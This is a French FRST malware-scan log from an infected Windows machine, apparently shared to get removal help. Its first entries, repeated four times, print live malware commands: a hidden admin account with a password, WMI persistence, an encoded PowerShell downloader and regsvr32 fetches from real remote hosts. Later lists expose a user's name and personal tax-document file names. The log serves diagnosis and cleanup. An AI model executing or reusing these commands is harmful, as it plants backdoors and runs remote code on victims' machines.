S2 BGVJ; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", 
Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
S2 PBAD; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", 
Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
S2 ZuiC; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", 
Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION
S2 ZWjH; cmd /c net1 user admin$ Zxcvbnm,.1234 /ad&net1 localgroup administrators admin$ /ad&net1 localgroup administradores admin$ /ad&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm3" DELETE&wmic /NAMESPACE:"\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETE&wmic /NAMESPACE:"\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host:8888/1.txt scrobj.dll®svr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll®svr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll"&wmic /NAMESPACE:"\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", 
Consumer="CommandLineEventConsumer.Name="fuckyoumm4""&start regsvr32 /s /u /n /i:http://173.208.172.202:8888\s1.txt scrobj.dll [X] <==== ATTENTION

===================== Pilotes (Avec liste blanche) ======================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [167480 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriverx.sys [188976 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidshx.sys [165384 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswblog; C:\Windows\System32\drivers\aswblogx.sys [284256 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbunivx.sys [57904 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
S3 aswHwid; C:\Windows\System32\drivers\aswHwid.sys [42736 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [40688 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [135200 2019-01-19] (AVAST Software s.r.o. -> AVAST Software)
R0 aswNdis; C:\Windows\System32\DRIVERS\aswNdis.sys [12112 2019-02-26] (ALWIL Software -> ALWIL Software)
R0 aswNdis2; C:\Windows\System32\drivers\aswNdis2.sys [332280 2019-02-26] (AVAST Software s.r.o. -> AVAST Software)
R1 AswRdr; C:\Windows\System32\drivers\aswRdr.sys [70640 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [72800 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [784560 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [398200 2019-04-29] (AVAST Software s.r.o. -> AVAST Software)
R3 aswStmXP; C:\Windows\System32\drivers\aswStmXP.sys [146584 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [310200 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
S3 atikmdag; C:\Windows\System32\DRIVERS\atikmdag.sys [3533824 2008-03-09] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
R0 AtiPcie; C:\Windows\System32\DRIVERS\AtiPcie.sys [7680 2006-10-30] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
S3 DrvAgent32; C:\Windows\system32\Drivers\DrvAgent32.sys [30504 2017-01-13] (eSupport.com, Inc -> Phoenix Technologies)
S4 iteatapi; C:\Windows\system32\drivers\iteatapi.sys [35944 2006-11-02] (Microsoft Windows -> Integrated Technology Express, Inc.)
S4 iteraid; C:\Windows\system32\drivers\iteraid.sys [35944 2006-11-02] (Microsoft Windows -> Integrated Technology Express, Inc.)
S3 LVUSBSta; C:\Windows\System32\drivers\lvusbsta.sys [22016 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 npf; C:\Windows\System32\drivers\npf.sys [35088 2011-02-11] (CACE Technologies, Inc. -> CACE Technologies, Inc.)
S4 ntrigdigi; C:\Windows\system32\drivers\ntrigdigi.sys [20608 2006-11-02] (Microsoft Windows -> N-trig Innovative Technologies)
S3 PID_0928; C:\Windows\System32\DRIVERS\LV561AV.SYS [211712 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S1 RapportAegle; C:\Program Files\Trusteer\Rapport\bin\RapportAegle.sys [296880 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S1 RapportCerberus_1908115; C:\ProgramData\Trusteer\Rapport\store\exts\RapportCerberus\baseline\RapportCerberus32_1908115.sys [1123304 2018-03-27] (IBM -> IBM Corp.) [Fichier non signé]
S1 RapportEI; C:\Program Files\Trusteer\Rapport\bin\RapportEI.sys [395624 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportHades; C:\Windows\System32\Drivers\RapportHades.sys [200936 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportIaso; c:\programdata\trusteer\rapport\store\exts\rapportms\baseline\rapportiaso.sys [299112 2018-03-27] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportKELL; C:\Windows\System32\Drivers\RapportKELL.sys [321256 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 RapportPG; C:\Program Files\Trusteer\Rapport\bin\RapportPG.sys [466728 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [22728 2019-05-17] (AVG Technologies CZ, s.r.o. -> SlimWare Utilities, Inc.)
S4 uliahci; C:\Windows\system32\drivers\uliahci.sys [238648 2008-01-21] (Microsoft Windows -> ULi Electronics Inc.)
S4 UlSata; C:\Windows\system32\drivers\ulsata.sys [98408 2006-11-02] (Microsoft Windows -> Promise Technology, Inc.)
S4 ulsata2; C:\Windows\system32\drivers\ulsata2.sys [115816 2008-01-21] (Microsoft Windows -> Promise Technology, Inc.)
R3 yukonwlh; C:\Windows\System32\DRIVERS\yk60x86.sys [298496 2007-12-28] (Microsoft Windows Hardware Compatibility Publisher -> Marvell)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Un mois (créés) ========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2019-05-17 15:29 - 2019-05-17 15:31 - 000040272 _____ C:\Users\françoise\Desktop\FRST.txt
2019-05-17 15:28 - 2019-05-17 15:29 - 000000000 ___DC C:\FRST
2019-05-17 15:26 - 2019-05-17 15:26 - 001793536 _____ (Farbar) C:\Users\françoise\Desktop\Non confirmé 306702.crdownload
2019-05-17 15:17 - 2019-05-17 15:28 - 001793536 _____ (Farbar) C:\Users\françoise\Desktop\FRST.exe
2019-05-17 15:07 - 2019-05-17 15:07 - 000069579 _____ C:\Users\françoise\Desktop\2019-05-17windows.pdf
2019-05-15 10:32 - 2019-05-15 10:32 - 000335224 _____ C:\Windows\system32\FNTCACHE.DAT
2019-05-15 09:03 - 2019-05-15 09:03 - 001852840 _____ (Orange) C:\Users\françoise\Documents\Orange-assistant-page-de-demarrage.exe
2019-05-13 07:45 - 2019-05-13 07:45 - 000000970 _____ C:\Users\Public\Desktop\Avast Cleanup Premium.lnk
2019-05-11 11:55 - 2019-05-11 11:55 - 000108649 _____ C:\Users\françoise\impot 2018 pour 2019.pdf
2019-05-11 11:23 - 2019-05-11 11:23 - 001852840 _____ (Orange) C:\Users\françoise\Orange-assistant-page-de-demarrage.exe
2019-05-11 09:59 - 2019-05-11 09:59 - 127391104 ____C (Microsoft Corporation) C:\Windows\system32\MRT-KB890830.exe
2019-05-06 08:48 - 2019-05-06 08:48 - 000049590 _____ C:\Users\françoise\Desktop\2019-05-06_084806 trojan.pdf
2019-05-05 09:55 - 2008-04-01 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP240 series Printer (Local).dll
2019-05-04 10:32 - 2019-05-04 10:32 - 000077121 _____ C:\Users\françoise\Desktop\facture_9046121647_2019-04-23.pdf
2019-05-04 06:47 - 2019-05-04 06:47 - 000000000 ____D C:\Users\françoise\AppData\Local\BitTorrentHelper
2019-05-02 14:21 - 2019-03-26 09:07 - 000013104 _____ C:\Users\françoise\Documents\ReleveMensuelJanvier2019.pdf
2019-05-02 14:02 - 2019-05-02 14:02 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Lavasoft
2019-05-02 14:02 - 2019-05-02 14:02 - 000000000 ____D C:\Users\françoise\AppData\Local\Lavasoft
2019-05-02 14:00 - 2019-05-15 11:00 - 000000000 ____D C:\Users\françoise\AppData\Roaming\uTorrent
2019-05-02 05:36 - 2019-05-17 14:36 - 000000080 _____ C:\Windows\system32\s
2019-05-02 05:36 - 2019-05-17 14:36 - 000000078 _____ C:\Windows\system32\ps
2019-05-02 05:36 - 2019-05-17 14:36 - 000000076 _____ C:\Windows\system32\p
2019-04-30 07:49 - 2019-04-30 07:51 - 000000000 ____D C:\Users\françoise\AppData\Roaming\fr.orange.assistancelivebox
2019-04-30 07:49 - 2019-04-30 07:49 - 000001030 _____ C:\Users\françoise\Desktop\ma Livebox.lnk
2019-04-30 07:49 - 2019-04-30 07:49 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Programs\Orange
2019-04-30 07:49 - 2019-04-30 07:49 - 000000000 ____D C:\Program Files\Bonjour
2019-04-30 07:48 - 2019-04-30 07:48 - 000000000 ____D C:\Program Files\WinPcap
2019-04-29 14:29 - 2019-05-02 12:54 - 000000000 ____D C:\Program Files\eMule
2019-04-28 17:36 - 2019-04-28 17:36 - 000000940 _____ C:\Users\françoise\Desktop\Attestation-Fiscale-PCI-2018 - Raccourci.lnk
2019-04-28 17:31 - 2019-04-28 17:31 - 000090439 _____ C:\Users\françoise\Avis_de_taxes_foncières_2018.pdf
2019-04-28 17:29 - 2019-04-28 17:29 - 000045749 _____ C:\Users\françoise\Desktop\Avis_de_taxe_d'habitation-CAP_2018.pdf
2019-04-28 17:11 - 2019-04-28 17:11 - 000122725 _____ C:\Users\françoise\Desktop\Réédition déclaration fiscale.pdf
2019-04-28 17:11 - 2019-04-28 17:11 - 000012768 _____ C:\Users\françoise\Desktop\Attestation-Fiscale-PCI-2018.pdf

==================== Un mois (modifiés) ========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2019-05-17 15:04 - 2006-11-02 14:47 - 000003216 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2019-05-17 15:04 - 2006-11-02 14:47 - 000003216 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2019-05-17 14:45 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\inf
2019-05-17 14:43 - 2018-08-16 06:34 - 000000466 _____ C:\Windows\Tasks\Avast Driver Updater Startup.job
2019-05-17 14:43 - 2013-10-12 15:14 - 000000000 _____ C:\Windows\system32\LogConfigTemp.xml
2019-05-17 14:42 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\system
2019-05-17 14:42 - 2006-11-02 13:18 - 000000000 ____D C:\Windows\IME
2019-05-17 14:41 - 2018-08-16 06:34 - 000022728 _____ (SlimWare Utilities, Inc.) C:\Windows\system32\Drivers\SWDUMon.sys
2019-05-17 14:37 - 2019-04-16 07:44 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\downs.exe
2019-05-17 14:37 - 2019-04-16 07:44 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
2019-05-17 14:36 - 2006-11-02 15:01 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-05-17 10:47 - 2006-11-02 15:01 - 000032578 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2019-05-17 09:59 - 2014-03-03 14:36 - 000000000 ____D C:\Users\françoise\AppData\Local\CrashDumps
2019-05-17 09:57 - 2016-11-17 16:19 - 000000000 ____D C:\Users\françoise\AppData\LocalLow\Mozilla
2019-05-16 07:04 - 2016-06-23 17:03 - 000000000 ____D C:\Users\françoise\AppData\Local\AVAST Software
2019-05-15 07:26 - 2013-11-27 06:24 - 000842296 _____ (Adobe) C:\Windows\system32\FlashPlayerApp.exe
2019-05-15 07:26 - 2013-11-27 06:24 - 000175160 _____ (Adobe) C:\Windows\system32\FlashPlayerCPLApp.cpl
2019-05-15 07:26 - 2008-12-16 05:33 - 000000000 ____D C:\Windows\system32\Macromed
2019-05-13 08:06 - 2018-02-19 04:40 - 000000000 ____D C:\Users\françoise\Desktop\Anciennes données de Firefox
2019-05-13 08:06 - 2016-12-18 08:17 - 000000000 ____D C:\Users\françoise\AppData\Local\Microsoft Help
2019-05-13 08:06 - 2013-10-25 19:22 - 000000000 ____D C:\Users\françoise\AppData\Roaming\Skype
2019-05-13 08:06 - 2008-12-16 13:14 - 000000000 ____D C:\Windows\Panther
2019-05-13 07:47 - 2013-10-18 12:04 - 000000000 ____D C:\Users\françoise\AppData\Roaming\AVAST Software
2019-05-13 07:45 - 2019-02-26 18:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVAST Software
2019-05-13 07:44 - 2013-10-12 17:12 - 000000000 ____D C:\Program Files\AVAST Software
2019-05-13 07:44 - 2013-10-12 17:11 - 000000000 ____D C:\ProgramData\AVAST Software
2019-05-11 11:55 - 2013-10-12 13:18 - 000000000 ____D C:\Users\françoise
2019-05-11 10:05 - 2006-11-02 12:24 - 128044056 ____C (Microsoft Corporation) C:\Windows\system32\mrt.exe
2019-04-30 07:49 - 2014-01-04 15:40 - 000000000 ____D C:\ProgramData\Orange
2019-04-30 07:49 - 2014-01-04 15:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Orange
2019-04-30 07:48 - 2014-01-04 15:38 - 000000000 ____D C:\Program Files\Orange
2019-04-30 07:23 - 2008-01-21 10:41 - 001592042 _____ C:\Windows\system32\PerfStringBackup.INI
2019-04-30 07:23 - 2008-01-21 10:40 - 000722222 _____ C:\Windows\system32\perfh00C.dat
2019-04-30 07:23 - 2008-01-21 10:40 - 000146056 _____ C:\Windows\system32\perfc00C.dat
2019-04-30 07:18 - 2015-08-08 08:54 - 000000000 ____D C:\Windows\Minidump
2019-04-29 14:00 - 2013-10-12 17:14 - 000398200 _____ (AVAST Software) C:\Windows\system32\Drivers\aswSP.sys
2019-04-28 17:16 - 2016-12-16 11:13 - 000000000 ____D C:\ProgramData\CanonIJPLM

==================== Fichiers à la racine de certains dossiers =======

2017-01-05 07:03 - 2017-01-05 07:03 - 001110564 _____ (Igor Pavlov) C:\Users\françoise\7z1604.exe
2016-12-17 19:47 - 2016-12-17 19:52 - 132368998 _____ () C:\Users\françoise\Apache_OpenOffice_4.1.3_Win_x86_install_fr.exe
2019-05-05 09:55 - 2008-04-01 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP240 series Printer (Local).dll
2019-02-04 12:39 - 2007-04-02 06:00 - 000055296 _____ (CANON INC.) C:\Users\françoise\cnmss Canon MP470 series Printer (Local).dll
2019-05-11 11:23 - 2019-05-11 11:23 - 001852840 _____ (Orange) C:\Users\françoise\Orange-assistant-page-de-demarrage.exe
2017-05-03 10:00 - 2017-05-03 10:00 - 002764800 _____ () C:\Users\françoise\ZHPCleaner.exe
2016-06-21 04:43 - 2016-07-22 19:54 - 002230272 _____ () C:\Users\françoise\ZHPDiag3.exe
2018-10-23 16:10 - 2018-10-23 16:10 - 007649280 _____ () C:\Program Files\GUT255C.tmp
2018-10-23 16:03 - 2018-10-23 16:03 - 007649280 _____ () C:\Program Files\GUTB931.tmp
2018-10-23 16:03 - 2018-10-23 16:03 - 007649280 _____ () C:\Program Files\GUTF103.tmp
2019-04-16 07:44 - 2019-05-17 14:37 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
2014-03-15 04:09 - 2014-11-03 14:34 - 000000481 _____ () C:\Users\françoise\AppData\Roaming\mainhst.zgh
2013-10-12 17:28 - 2015-03-31 08:23 - 000026340 _____ () C:\Users\françoise\AppData\Roaming\UserTile.png
2014-09-25 18:59 - 2018-01-17 07:40 - 000000698 _____ () C:\Users\françoise\AppData\Roaming\wklnhst.dat
2013-11-12 12:46 - 2018-01-11 10:05 - 000008808 _____ () C:\Users\françoise\AppData\Local\d3d9caps.dat
2015-02-18 05:20 - 2015-02-18 05:20 - 000001974 _____ () C:\Users\françoise\AppData\Local\ZHPFixReport.txt

==================== SigCheck ===============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)


LastRegBack: 2019-05-17 14:47
==================== Fin de FRST.txt ============================
